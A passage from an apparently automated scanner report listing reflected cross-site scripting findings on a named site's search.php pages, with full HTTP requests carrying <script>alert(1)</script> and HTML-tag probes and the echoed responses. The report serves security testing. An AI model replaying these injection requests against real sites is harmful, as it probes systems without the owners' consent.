<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd0db3<a>69ad84d9002&opt=2 was not found on this server.</p>
...[SNIP]...

2.1184. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f9097<a>1db2c19b429 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/search.php?keyword=search...f9097<a>1db2c19b429&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/search.php?keyword=search...f9097<a>1db2c19b429&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1185. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b7cff<script>alert(1)</script>99d9e0c6c96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&b7cff<script>alert(1)</script>99d9e0c6c96=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&b7cff<script>alert(1)</script>99d9e0c6c96=1 was not found on this server.</p>
...[SNIP]...

2.1186. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 458e5<a>bb962339ef8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2458e5<a>bb962339ef8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2458e5<a>bb962339ef8 was not found on this server.</p>
...[SNIP]...

2.1187. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1cc4d<script>alert(1)</script>c7959173e68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1cc4d<script>alert(1)</script>c7959173e68/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1cc4d<script>alert(1)</script>c7959173e68/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1188. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e5351<script>alert(1)</script>615983e18b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14e5351<script>alert(1)</script>615983e18b7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14e5351<script>alert(1)</script>615983e18b7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1189. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40972<script>alert(1)</script>2450c37d473 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes40972<script>alert(1)</script>2450c37d473/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes40972<script>alert(1)</script>2450c37d473/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1190. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fa479<script>alert(1)</script>1b0c38ea23e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmosfa479<script>alert(1)</script>1b0c38ea23e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmosfa479<script>alert(1)</script>1b0c38ea23e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1191. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f0ecf<script>alert(1)</script>968814fd93a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/search.phpf0ecf<script>alert(1)</script>968814fd93a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/search.phpf0ecf<script>alert(1)</script>968814fd93a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1192. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5b717<a>181bd3bc28 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search5b717<a>181bd3bc28&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search5b717<a>181bd3bc28&opt=2 was not found on this server.</p>
...[SNIP]...

2.1193. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 65b06<a>677dde48bf4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/search.php?keyword=search...65b06<a>677dde48bf4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/search.php?keyword=search...65b06<a>677dde48bf4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1194. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a64e8<script>alert(1)</script>740f4b256f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&a64e8<script>alert(1)</script>740f4b256f9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&a64e8<script>alert(1)</script>740f4b256f9=1 was not found on this server.</p>
...[SNIP]...

2.1195. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ea340<a>758ed83ba2e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ea340<a>758ed83ba2e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ea340<a>758ed83ba2e was not found on this server.</p>
...[SNIP]...

2.1196. http://www.resellerbase.com/detail/14/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f304<script>alert(1)</script>c2fe9c267a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8f304<script>alert(1)</script>c2fe9c267a9/14/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8f304<script>alert(1)</script>c2fe9c267a9/14/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1197. http://www.resellerbase.com/detail/14/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d945<script>alert(1)</script>a397b260f1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/143d945<script>alert(1)</script>a397b260f1c/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/143d945<script>alert(1)</script>a397b260f1c/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1198. http://www.resellerbase.com/detail/14/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7975a<script>alert(1)</script>362d6fc477b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes7975a<script>alert(1)</script>362d6fc477b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes7975a<script>alert(1)</script>362d6fc477b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1199. http://www.resellerbase.com/detail/14/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2dae0<script>alert(1)</script>647fe07d29f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/search.php2dae0<script>alert(1)</script>647fe07d29f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/search.php2dae0<script>alert(1)</script>647fe07d29f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1200. http://www.resellerbase.com/detail/14/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d94d2<a>e1e62fc273 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/search.php?keyword=search...&Submit3=Searchd94d2<a>e1e62fc273&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/search.php?keyword=search...&Submit3=Searchd94d2<a>e1e62fc273&opt=2 was not found on this server.</p>
...[SNIP]...

2.1201. http://www.resellerbase.com/detail/14/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9fb89<a>46c98aa203 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/search.php?keyword=search...9fb89<a>46c98aa203&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
